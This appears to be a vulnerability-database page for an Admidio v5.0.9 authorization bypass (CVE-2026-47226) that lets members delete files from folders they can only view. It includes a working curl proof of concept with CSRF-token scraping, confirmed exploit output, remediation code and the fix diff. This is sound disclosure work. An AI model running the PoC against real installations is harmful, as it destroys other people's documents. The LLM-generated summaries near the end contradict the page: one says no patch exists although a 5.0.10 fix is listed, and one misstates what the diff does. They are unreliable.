VYPR
← All advisories
Medium severity6.5GHSA Advisory· Published May 29, 2026· Updated May 29, 2026

Admidio: Authorization bypass in file_delete enables cross-folder file removal by authenticated users without delete privileges

CVE-2026-47226

Description

Summary

An authenticated Admidio member with upload rights on any one folder can permanently delete files from folders where they have only view access. The authorization check at the top of modules/documents-files.php evaluates upload rights against the attacker-supplied folder_uuid URL parameter — not the file's actual parent folder. The file_delete handler then only verifies view rights on the file's real location, never upload rights. By passing a folder they legitimately own in folder_uuid while targeting a file in a restricted folder via file_uuid, an attacker bypasses the upload-right check entirely and permanently deletes the file.

This is an incomplete fix of GHSA-rmpj-3x5m-9m5f, which was patched in v5.0.7 but remains exploitable in v5.0.9.

Affected Version: Admidio v5.0.9

---

Details

Root Cause File: modules/documents-files.php

**Issue 1 — folder_uuid is not required for file_delete mode (line 67):**

$getFolderUUID = admFuncVariableIsValid($_GET, 'folder_uuid', 'uuid', array(
    'requireValue' => !in_array($getMode, array('list', 'file_delete', 'download'))
));

Issue 2 — The top-level upload-right check loads the folder from the attacker-controlled URL parameter, not the file's actual parent folder (lines 79–88):

if ($getMode != 'list' && $getMode != 'download') {
    $folder = new Folder($gDb);
    $folder->getFolderForDownload($getFolderUUID);   // uses attacker-supplied UUID
    if (!$folder->hasUploadRight()) {
        $gMessage->show($gL10n->get('SYS_NO_RIGHTS'));
    }
}

**Issue 3 — The file_delete handler only checks view rights via getFileForDownload(). Upload rights on the file's actual folder are never verified (lines 165–178):**

case 'file_delete':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $file = new File($gDb);
    $file->getFileForDownload($getFileUUID);   // view-only check, not upload
    $file->delete();
    echo json_encode(array('status' => 'success'));
    break;

File::getFileForDownload() in src/Documents/Entity/File.php checks only view-role membership — it never verifies upload rights.

---

Attack

Scenario

  1. The organization has two folders: PrivateFolder (role A: view-only) and UploadFolder (role A: upload + view).
  2. Attacker is a member of role A — they have legitimate upload access to UploadFolder only.
  3. Attacker enumerates a file UUID in PrivateFolder using file_list mode, which is accessible to anyone with view rights.
  4. Attacker sends a file_delete POST using UploadFolder's UUID in folder_uuid and the PrivateFolder file UUID in file_uuid.
  5. Server checks upload rights against UploadFolderpasses.
  6. Server deletes the file from PrivateFolder without ever checking upload rights there.

Prerequisites:

  • Authenticated Admidio member account
  • Upload rights on at least one folder (legitimately assigned)
  • View rights on the target folder (sufficient to enumerate file UUIDs via file_list mode)
  • Knowledge of a target file UUID (obtainable from the folder listing)

---

PoC

Step 1 — Authenticate and obtain login CSRF token:

curl -c /tmp/admidio_cookies.txt http://TARGET/system/login.php > /tmp/login.html

LOGIN_CSRF=$(grep -o 'name="adm_csrf_token"[^>]*value="[^"]*"' /tmp/login.html \
  | grep -o 'value="[^"]*"' | cut -d'"' -f2)

curl -b /tmp/admidio_cookies.txt -c /tmp/admidio_cookies.txt \
  -X POST "http://TARGET/system/login.php?mode=check" \
  -d "usr_login_name=MEMBER&usr_password=PASSWORD&adm_csrf_token=${LOGIN_CSRF}"

Step 2 — Extract authenticated session CSRF token:

AUTH_CSRF=$(curl -s -b /tmp/admidio_cookies.txt \
  "http://TARGET/system/file_upload.php?module=documents_files&uuid=UPLOAD_FOLDER_UUID" \
  | grep -oP 'name:\s*"adm_csrf_token",\s*value:\s*"\K[^"]+')

Step 3 — Delete file from restricted folder using the upload folder UUID as bypass:

curl -b /tmp/admidio_cookies.txt \
  -X POST "http://TARGET/modules/documents-files.php?mode=file_delete&file_uuid=PRIVATE_FILE_UUID&folder_uuid=UPLOAD_FOLDER_UUID" \
  -d "adm_csrf_token=${AUTH_CSRF}"

Expected response: {"status":"success"}

**Confirmed on Docker — Admidio v5.0.9 (admidio/admidio:v5.0.9):**

[*] Login CSRF: qhlOt8RB12vIuzBYD4eUVDk1VlVKqN
[+] Authenticated as 'testmember'
[*] Operation CSRF: EacPuqIWUKVIb7PcVrMypikUrblhhn
[*] Sending file_delete for 93dc6280-4332-11f1-bba7-0242ac110003 via folder bypass...
[*] HTTP 200: {"status":"success"}

[!!!] VULNERABLE — file deleted without upload rights on target folder
      Deleted file UUID: 93dc6280-4332-11f1-bba7-0242ac110003

testmember holds upload rights only on UploadFolder. secret2.txt (UUID 93dc6280-...-bba7-...) resided in PrivateFolder and was permanently deleted from both the database and filesystem.

---

Impact

An authenticated Admidio member with legitimate upload access to any one folder can permanently delete files from any other folder to which they have view access — without authorization. In organizations where upload rights are delegated by role (e.g., team leads upload to their own folder, view-only everywhere else), this enables cross-folder sabotage and permanent destruction of shared documents.

Business Impact: Data loss, destruction of shared organizational documents, and compliance violations in organizations relying on Admidio for document management.

Remediation

In the file_delete handler, after loading the file via getFileForDownload(), verify upload rights against the file's actual parent folder — not the URL-supplied folder_uuid:

case 'file_delete':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $file = new File($gDb);
    $file->getFileForDownload($getFileUUID);

    // Verify upload rights on the file's actual parent folder
    $parentFolder = new Folder($gDb);
    $parentFolder->readDataById((int)$file->getValue('fil_fol_id'));
    if (!$parentFolder->hasUploadRight()) {
        $gMessage->show($gL10n->get('SYS_NO_RIGHTS'));
    }

    $file->delete();
    echo json_encode(array('status' => 'success'));
    break;

Alternative fix: Remove the top-level folder_uuid check for file_delete entirely and move a proper upload-rights verification into the file_delete case as the sole authority for authorization.

Defense-in-depth recommendations:

  • Audit all other modes in documents-files.php (e.g., folder_delete, file_rename) for the same pattern of trusting folder_uuid from the URL instead of the resource's actual parent.
  • Add an integration test asserting a user with upload rights on Folder A cannot perform destructive operations on files in Folder B.
  • Consider centralizing authorization in a single helper (e.g., assertUploadRightOnFile($fileUuid)) to eliminate the URL-parameter trust-boundary issue across the codebase.

---

Credits

  • Researcher: Vishal Kumar B - https://github.com/VishaaLlKumaaRr - Security Researcher & Penetration Tester
  • Disclosure: Responsible disclosure to Admidio maintainers

Resources

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authenticated Admidio members with upload rights on any folder can delete files in restricted folders via an authorization bypass in `file_delete` handler.

Vulnerability

The modules/documents-files.php script in Admidio v5.0.9 performs an upload-right check against the attacker-supplied folder_uuid URL parameter, not the file's actual parent folder. The file_delete handler then only verifies view rights on the file's real location, never upload rights. This allows an authenticated member with upload rights on any folder to bypass the intended authorization and delete files from folders where they only have view access. The issue is an incomplete fix of GHSA-rmpj-3x5m-9m5f (patched in v5.0.7) [1], [2], [3].

Exploitation

An attacker must be an authenticated Admidio member with upload rights on at least one folder (e.g., a folder they created or have upload permission on). The attacker sends a POST request to modules/documents-files.php with mode=file_delete, providing a folder_uuid of a folder they have upload rights on, and a file_uuid of a file in a restricted folder (view-only). The top-level upload check passes because it uses the attacker's folder_uuid, and the file_delete handler only checks view rights via getFileForDownload(), which succeeds. The file is permanently deleted [2], [3].

Impact

The attacker can permanently delete arbitrary files from any folder in the documents/files module where they have view access. This leads to loss of data integrity and availability. No privilege escalation occurs, but the deletion is irreversible unless backups exist. The scope is limited to files the attacker can see; they cannot delete files in hidden folders unless they have view rights.

Mitigation

Admidio has acknowledged this as an incomplete fix of the earlier vulnerability. As of the publication date (2026-05-29), no patched version has been released for v5.0.9. The only workaround is to restrict upload rights to trusted users or disable the documents/files module (set documents_files_module_enabled to 0). Admins should monitor the official repository for a new release [1], [2], [3].

References
  1. Missing Authorization and CSRF Protection on Document and Folder Deletion
  2. CVE-2026-47226 - GitHub Advisory Database
  3. Authorization Bypass in file_delete Enables Cross-Folder File Deletion by Authenticated Members

AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Admidio/AdmidioGHSA2 versions
    <= 5.0.9+ 1 more
    • (no CPE)range: <= 5.0.9
    • (no CPE)range: = 5.0.9

Patches

2
59a08a5f4587

Folder rights not checked when working with files #2035

https://github.com/admidio/admidioMarkus FaßbenderMay 2, 2026Fixed in 5.0.10via llm-release-walk
commit
2 files changed · +9 8
  • modules/documents-files.php+7 5 modified
    @@ -62,11 +62,7 @@
                 'download')
         )
     );
-    $getFolderUUID = admFuncVariableIsValid($_GET, 'folder_uuid', 'uuid',
-        array(
-            'requireValue' => !in_array($getMode, array('list', 'file_delete', 'download'))
-        )
-    );
+    $getFolderUUID = admFuncVariableIsValid($_GET, 'folder_uuid', 'uuid');
     $getFileUUID = admFuncVariableIsValid($_GET, 'file_uuid', 'uuid');
 
     // Check if the module is activated
@@ -77,6 +73,12 @@
     }
 
     if ($getMode != 'list' && $getMode != 'download') {
+        if ($getFileUUID !== '') {
+            // when file UUID is set then read the folder of that file from database and check the rights
+            $file = new File($gDb);
+            $file->readDataByUuid($getFileUUID);
+            $getFolderUUID = $file->getValue('fol_uuid');
+        }
         // check the rights of the current folder
         // user must be administrator or must have the right to upload files
         $folder = new Folder($gDb);
  • src/UI/Presenter/DocumentsPresenter.php+2 3 modified
    @@ -92,7 +92,7 @@ public function createFileRenameForm(string $fileUUID): void
         $form = new FormPresenter(
             'adm_documents_file_rename_form',
             'modules/documents-files.rename.tpl',
-            SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php', array('mode' => 'file_rename_save', 'folder_uuid' => $this->folderUUID, 'file_uuid' => $fileUUID)),
+            SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php', array('mode' => 'file_rename_save', 'file_uuid' => $fileUUID)),
             $this
         );
         $form->addInput(
@@ -592,14 +592,13 @@ public function createList(): void
                             'url' => SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php',
                                 array(
                                     'mode' => 'file_rename',
-                                    'folder_uuid' => $this->folder->getValue('fol_uuid'),
                                     'file_uuid' => $row['uuid']
                                 )),
                             'icon' => 'bi bi-pencil-square',
                             'tooltip' => $gL10n->get('SYS_EDIT')
                         );
                         $templateRow['actions'][] = array(
-                            'url' => SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php', array('mode' => 'move', 'folder_uuid' => $this->folder->getValue('fol_uuid'), 'file_uuid' => $row['uuid'])),
+                            'url' => SecurityUtils::encodeUrl(ADMIDIO_URL . FOLDER_MODULES . '/documents-files.php', array('mode' => 'move', 'file_uuid' => $row['uuid'])),
                             'icon' => 'bi bi-folder-symlink',
                             'tooltip' => $gL10n->get('SYS_MOVE_FILE')
                         );
8f7a2884e9dc

set version to 5.0.10

https://github.com/admidio/admidioMarkus FaßbenderMay 18, 2026Fixed in 5.0.10via release-tag
commit
1 file changed · +1 1
  • system/bootstrap/constants.php+1 1 modified
    @@ -23,7 +23,7 @@
 
 const ADMIDIO_VERSION_MAIN = 5;
 const ADMIDIO_VERSION_MINOR = 0;
-const ADMIDIO_VERSION_PATCH = 9;
+const ADMIDIO_VERSION_PATCH = 10;
 const ADMIDIO_VERSION_BETA = 0;
 
 const ADMIDIO_VERSION = ADMIDIO_VERSION_MAIN . '.' . ADMIDIO_VERSION_MINOR . '.' . ADMIDIO_VERSION_PATCH;

Vulnerability mechanics

Root cause

"The authorization check in modules/documents-files.php evaluates upload rights against the attacker-supplied folder_uuid URL parameter instead of the file's actual parent folder, and the file_delete handler never verifies upload rights on the file's real location."

Attack vector

An authenticated Admidio member with upload rights on any one folder can permanently delete files from folders where they only have view access. The attacker supplies a folder UUID they control in the `folder_uuid` parameter while targeting a file in a restricted folder via `file_uuid`. The server checks upload rights against the attacker-supplied folder (passes), then deletes the file from the restricted folder without ever verifying upload rights there. This is an authorization bypass through user-controlled key [CWE-639] and missing authorization [CWE-862] as described in `[ref_id=2]` and `[ref_id=3]`.

Affected code

The vulnerability resides in `modules/documents-files.php`. The top-level upload-right check (lines 79–88) loads the folder from the attacker-controlled `folder_uuid` URL parameter rather than the file's actual parent folder. The `file_delete` handler (lines 165–178) only verifies view rights via `getFileForDownload()` and never checks upload rights on the file's real parent folder. The patch `[patch_id=3130377]` fixes this by reading the file's folder UUID from the database when `file_uuid` is set, then using that folder for the rights check.

What the fix does

The patch `[patch_id=3130377]` removes `file_delete` from the list of modes where `folder_uuid` is not required, making `folder_uuid` always mandatory. More importantly, when a `file_uuid` is present, the code now reads the file's actual folder UUID from the database and overwrites `$getFolderUUID` with that value before performing the upload-rights check. This ensures the authorization check is evaluated against the file's real parent folder, not an attacker-supplied value. The patch also removes `folder_uuid` from the rename and move URLs in `DocumentsPresenter.php` to prevent similar bypasses.

Preconditions

  • authAuthenticated Admidio member account
  • authUpload rights on at least one folder (legitimately assigned)
  • authView rights on the target folder (sufficient to enumerate file UUIDs via file_list mode)
  • inputKnowledge of a target file UUID (obtainable from the folder listing)

Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3

News mentions

0

No linked articles in our index yet.